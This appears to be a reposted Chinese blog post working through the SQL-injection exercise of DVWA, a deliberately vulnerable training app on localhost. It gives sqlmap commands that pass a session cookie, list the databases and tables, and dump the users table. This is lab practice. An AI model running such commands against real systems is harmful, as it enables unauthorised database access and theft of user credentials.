首页 > 数据库> > DVWA练习——sql注入

DVWA练习——sql注入

2022-01-30 17:02:29 作者：互联网

一、sql injection

（1）由于dvwa需要登录，因此直接无法获取数据库的内容，则需要在sql注入语句中添加网站的cookie以绕过登录

获取cookie：

（2）sqlmap获取数据库：

python sqlmap.py -u "http://127.0.0.1:8082/vulnerabilities/sqli/?id=4354&Submit=Submit" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" --dbs -batch

查询到dvwa和information_schema两个数据库

（3）对查询到的可疑数据库dvwa查表：

python sqlmap.py -u "http://127.0.0.1:8082/vulnerabilities/sqli/?id=4354&Submit=Submit" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" -D dvwa --tables --batch

（4）求users的dump数据：

python sqlmap.py -u "http://127.0.0.1:8082/vulnerabilities/sqli/?id=4354&Submit=Submit" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" -D dvwa --tables -T users --dump --batch

成功获取用户信息。

标签：sqlmap,--,练习,dvwa,Submit,0.1,cookie,DVWA,sql
来源： https://blog.csdn.net/haoaaao/article/details/122753581